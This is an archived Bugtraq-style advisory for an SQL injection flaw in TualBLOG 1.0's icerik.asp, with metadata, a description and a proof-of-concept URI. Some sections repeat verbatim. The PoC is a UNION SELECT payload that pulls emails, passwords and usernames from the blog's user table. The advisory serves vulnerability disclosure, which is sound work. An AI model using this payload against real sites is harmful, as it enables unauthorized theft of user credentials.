TualBLOG Icerik.ASP SQL Injection Vulnerability
BID:20002
CVE-2006-4793 |Info
TualBLOG Icerik.ASP SQL Injection Vulnerability
| Bugtraq ID: | 20002 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 13 2006 12:00AM |
| Updated: | Sep 14 2006 06:02PM |
| Credit: | Dj ReMix is credited with discovering this vulnerability. |
| Vulnerable: |
TualBLOG TualBLOG 1.0 |
| Not Vulnerable: | |
Discussion
TualBLOG Icerik.ASP SQL Injection Vulnerability
TualBLOG is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
TualBLOG is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Exploit / POC
TualBLOG Icerik.ASP SQL Injection Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
Dj ReMix
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
Dj ReMix
Solution / Fix
TualBLOG Icerik.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
TualBLOG Icerik.ASP SQL Injection Vulnerability
References:
References:
- TualBLOG Homepage (Aspindir)
- TualBLOG v 1.0 multiple sql injection (Dj ReMix)